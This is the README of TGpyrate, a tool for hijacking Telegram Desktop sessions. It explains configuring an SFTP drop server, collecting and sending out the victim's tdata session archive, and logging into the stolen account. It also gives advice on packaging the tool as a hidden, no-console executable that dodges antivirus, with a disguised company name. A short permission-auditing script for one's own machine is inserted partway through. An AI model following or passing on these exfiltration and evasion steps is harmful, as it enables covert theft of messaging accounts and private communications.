Telegram session hijacker with SFTP.
Telegram is sometimes referred to as a privacy-focused instant messenger.
Although it's FOSS and advertised as having good privacy, it's defenseless against local malware or forensics.
TGpyrate was written to demonstrate that.
$ git clone https://github.com/noarchwastaken/TGpyrate.git
$ cd TGpyrate
To run TGpyrate, you need:
python3 (tested on 3.9.1)
paramiko (tested on 2.7.2)
TGpyrate can automatically detect running "portable" versions of Telegram Desktop on Windows. To enable this optional feature, you need:
psutil (tested on 5.7.2)
To make it actually useful, (of course) you need Telegram Desktop.
You can also bundle it using pyinstaller or nuitka.
To install everything mentioned here (assuming you have Python 3 and pip installed):
$ pip install -U -r requirements.txt
TGpyrate relies on an SFTP server to receive the data it collects.
An OpenSSH server with PasswordAuthentication yes would serve that purpose.
It is also suggested to create a temporary user with a randomly generated password, and delete it once you are done.
TGpyrate uses hard-coded parameters that you can modify before running.
To do this, open tgpyrate.py with a text editor, and edit according to your needs. Here's an example:
...
""" START USER PARAMETERS """
# your SFTP server info
# SFTP server location
SFTP_HOST = '127.0.0.1'
# SFTP server port
SFTP_PORT = 22
# SFTP server user
SFTP_USER = 'noarch'
# password of that remote user
SFTP_PASS = 'etarypGT'
...
After you have modified the SFTP server info, you can proceed to run TGpyrate:
$ python3 tgpyrate.py
The program will run for a while, and you should see a tar file containing the Telegram session data in the SFTP user's home directory.
The file structure of the archive is relative to the target root, so it would look like this:
home
└── noarch
    ├── .local
    │   └── share
    │       └── TelegramDesktop
    │           └── tdata
    │               ├── ...
    │               └── ...
    │   ├── ...
...
The most basic usage of the extracted data is to simply put it in Telegram Desktop.
Assuming you are using the Telegram Desktop appimage on GNU/Linux, your Telegram Desktop data should be in:
~/.local/share/TelegramDesktop
Extract the TelegramDesktop directory of the archive to replace the above TelegramDesktop directory.
Open Telegram Desktop; you should be logged in to the target's account and have full access to it.
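For checking your own machine, the added example below (not part of TGpyrate) audits the tdata directory named above for entries that other local accounts could read or modify, and can optionally tighten them. The name audit_tdata and its parameters are assumptions of this example; it does not address a process running as the same user, which is the case TGpyrate demonstrates.

```python
import os
import stat
from pathlib import Path

# Data directory named on this page (Telegram Desktop AppImage on GNU/Linux).
DEFAULT_TDATA = Path.home() / ".local/share/TelegramDesktop/tdata"


def audit_tdata(tdata=DEFAULT_TDATA, expected_uid=None, fix=False):
    """Return (path, issue) pairs for session files exposed to other local users.

    audit_tdata and its parameters are hypothetical names for this example.
    With fix=True, group/other permission bits are also removed.
    """
    uid = os.getuid() if expected_uid is None else expected_uid
    findings = []
    if not os.path.isdir(tdata):
        return findings  # no Telegram Desktop data at this location

    # Collect the directory itself plus everything below it, without
    # descending through symlinks.
    paths = [os.fspath(tdata)]
    for root, dirs, files in os.walk(tdata, followlinks=False):
        paths.extend(os.path.join(root, name) for name in dirs + files)

    for path in paths:
        st = os.lstat(path)
        if stat.S_ISLNK(st.st_mode):
            # A link can point session data at a location with other permissions.
            findings.append((path, "symlink"))
            continue
        if st.st_uid != uid:
            findings.append((path, f"owned by uid {st.st_uid}"))
        mode = stat.S_IMODE(st.st_mode)
        if mode & 0o077:
            findings.append((path, f"group/other bits {mode & 0o077:03o}"))
            if fix:
                os.chmod(path, mode & 0o700)
    return findings


if __name__ == "__main__":
    for path, issue in audit_tdata():
        print(f"{issue}: {path}")
```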
The name of TGpyrate's output file contains the target's OS type, version and the execution time in ISO format.
If you like hacking around, modify SFTP_DEST.
SFTP_DEST = '{}-{}.tar.gz'.format(platform.platform(),
                                  datetime.now(timezone.utc)
                                  .astimezone()
                                  .isoformat(timespec='seconds'))
If you want to save some bandwidth for the target, enable Gzip compression by setting GZIP_COMP_LEVEL. For example:
GZIP_COMP_LEVEL = 4
You may also want to include the .gz extension in SFTP_DEST, as in the example above.
By default, TGpyrate searches through a series of default Telegram data storage locations.
You can add your own to installation_locations.
The simplest way to bundle TGpyrate is by using pyinstaller. You will need to have pyinstaller installed:
$ pip install pyinstaller
To bundle TGpyrate to a single, standalone executable that runs without opening a console, simply run:
$ pyinstaller -F --noconsole tgpyrate.py
and the output executable will be in the dist directory.
Note that some Windows antivirus products treat all executables generated by pyinstaller as viruses, so you would probably need nuitka if your target machine is running Windows.
Nuitka is a Python bundler / compiler.
It is available on PyPI:
$ pip install nuitka
For nuitka to work, you will need a C compiler like GCC or MSVC. nuitka will prompt you to install one if you don't have it already.
After you get the compiler set up, run this to compile a single, standalone, no console executable for Windows:
$ python3 -m nuitka --standalone --onefile --windows-disable-console --windows-company-name=<your imaginary company here> --windows-file-version=11.45.14
In noarchwastaken's testing, nuitka would fail to run in --onefile mode on GNU/Linux, probably due to some problems when dealing with AppImageKit.
No further testing has been done... Please open an issue if you find a solution.
For more information, read the Nuitka User Manual.
Feel free to open issues or PRs on this <150 sloc little script ;)
(c) 2021 noarchwastaken
This program is licensed under the GNU General Public License, Version 3. See the full license here.
This program is not intended to be used for illegal activities.
noarchwastaken is NOT responsible for any consequences of using this program.